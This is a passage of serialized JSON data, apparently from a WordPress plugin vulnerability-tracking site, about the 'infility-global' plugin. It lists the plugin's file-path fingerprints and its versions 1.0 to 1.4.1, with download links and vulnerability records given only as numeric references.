checks","2026-03-16T21:10:02.783Z",{"wat":1275,"direct":1304},{"assetPaths":1276,"generatorPatterns":1289,"scriptPaths":1290,"versionParams":1291},[1277,1278,1279,1280,1281,1282,1283,1284,1285,1286,1287,1288],"\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fcss\u002Finfility-global.css","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility-global.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_chat_tool.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_data_collection.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_lang_switch.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_login_security.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_redirect.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_sitemap.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_whatsapp.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_elementor_posts.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_gutenberg.js","\u002Fwp-content\u002Fplugins\u002Finfility-global\u002Fjs\u002Finfility_global_reading_progress.js",[],[1278,1279,1280,1281,1282,1283,1284,1285,1286,1287,1288],[1292,1293,1294,1295,1296,1297,1298,1299,1300,1301,1302,1303],"infility-global\u002Fcss\u002Finfility-global.css?ver=","infility-global\u002Fjs\u002Finfility-global.js?ver=","infility-global\u002Fjs\u002Finfility_global_chat_tool.js?ver=","infility-global\u002Fjs\u002Finfility_global_data_collection.js?ver=","infility-global\u002Fjs\u002Finfility_global_lang_switch.js?ver=","infility-global\u002Fjs\u002Finfility_global_login_security.js?ver=","infility-global\u002Fjs\u002Finfility_global_redirect.js?ver=","infility-global\u002Fjs\u002Finfility_global_sitemap.js?ver=","infility-global\u002Fjs\u002Finfility_global_whatsapp.js?ver=","infility-global\u002Fjs\u002Finfility_global_elementor_posts.js?ver=","infility-global\u002Fjs\u002Finfility_global_gutenberg.js?ver=","infility-global\u002Fjs\u002Finfility_global_reading_progress.js?ver=",{"cssClasses":1305,"htmlComments":1307,"htmlAttributes":1309,"restEndpoints":1310,"jsGlobals":1312,"shortcodeOutput":1315},[1306],"infility-global-chat-tool-box",[1308],"infility_global_chat_tool.js",[],[1311],"\u002Fwp-json\u002Finfility-global\u002Fv1\u002Fajax",[1313,1314],"infility_global_ajax_object","infility_global_config",[1316],"[infility_power_by]",{"error":391,"url":1318,"statusCode":823,"statusMessage":1319,"message":1319},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Finfility-global\u002Fbundle","no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":25,"versions":1321},[1322,1340,1358,1376,1394,1412,1430],{"version":1323,"download_url":1324,"svn_tag_url":1325,"released_at":35,"has_diff":46,"diff_files_changed":1326,"diff_lines":35,"trac_diff_url":1327,"vulnerabilities":1328,"is_current":46},"1.4.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.4.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.4.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.4&new_path=%2Finfility-global%2Ftags%2F1.4.1",[1329,1330,1331,1332,1333,1334,1335,1336,1337,1338,1339],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1341,"download_url":1342,"svn_tag_url":1343,"released_at":35,"has_diff":46,"diff_files_changed":1344,"diff_lines":35,"trac_diff_url":1345,"vulnerabilities":1346,"is_current":46},"1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.3.1&new_path=%2Finfility-global%2Ftags%2F1.4",[1347,1348,1349,1350,1351,1352,1353,1354,1355,1356,1357],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1359,"download_url":1360,"svn_tag_url":1361,"released_at":35,"has_diff":46,"diff_files_changed":1362,"diff_lines":35,"trac_diff_url":1363,"vulnerabilities":1364,"is_current":46},"1.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.3.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.3.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.3&new_path=%2Finfility-global%2Ftags%2F1.3.1",[1365,1366,1367,1368,1369,1370,1371,1372,1373,1374,1375],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1377,"download_url":1378,"svn_tag_url":1379,"released_at":35,"has_diff":46,"diff_files_changed":1380,"diff_lines":35,"trac_diff_url":1381,"vulnerabilities":1382,"is_current":46},"1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.2&new_path=%2Finfility-global%2Ftags%2F1.3",[1383,1384,1385,1386,1387,1388,1389,1390,1391,1392,1393],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1395,"download_url":1396,"svn_tag_url":1397,"released_at":35,"has_diff":46,"diff_files_changed":1398,"diff_lines":35,"trac_diff_url":1399,"vulnerabilities":1400,"is_current":46},"1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.1&new_path=%2Finfility-global%2Ftags%2F1.2",[1401,1402,1403,1404,1405,1406,1407,1408,1409,1410,1411],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1413,"download_url":1414,"svn_tag_url":1415,"released_at":35,"has_diff":46,"diff_files_changed":1416,"diff_lines":35,"trac_diff_url":1417,"vulnerabilities":1418,"is_current":46},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Finfility-global%2Ftags%2F1.0&new_path=%2Finfility-global%2Ftags%2F1.1",[1419,1420,1421,1422,1423,1424,1425,1426,1427,1428,1429],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":1431,"download_url":1432,"svn_tag_url":1433,"released_at":35,"has_diff":46,"diff_files_changed":1434,"diff_lines":35,"trac_diff_url":35,"vulnerabilities":1435,"is_current":46},"1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Finfility-global\u002Ftags\u002F1.0\u002F",[],[1436,1437,1438,1439,1440,1441,1442,1443,1444,1445,1446],{"id":144,"url_slug":145,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":149},{"id":116,"url_slug":117,"title":118,"severity":62,"cvss_score":122,"vuln_type":124,"patched_in_version":121},{"id":78,"url_slug":79,"title":80,"severity":62,"cvss_score":83,"vuln_type":85,"patched_in_version":35},{"id":132,"url_slug":133,"title":134,"severity":37,"cvss_score":38,"vuln_type":137,"patched_in_version":35},{"id":194,"url_slug":195,"title":196,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":184},{"id":57,"url_slug":58,"title":59,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":99,"url_slug":100,"title":101,"severity":62,"cvss_score":63,"vuln_type":40,"patched_in_version":35},{"id":179,"url_slug":180,"title":181,"severity":37,"cvss_score":38,"vuln_type":186,"patched_in_version":184},{"id":159,"url_slug":160,"title":146,"severity":37,"cvss_score":150,"vuln_type":85,"patched_in_version":35},{"id":168,"url_slug":169,"title":170,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35}]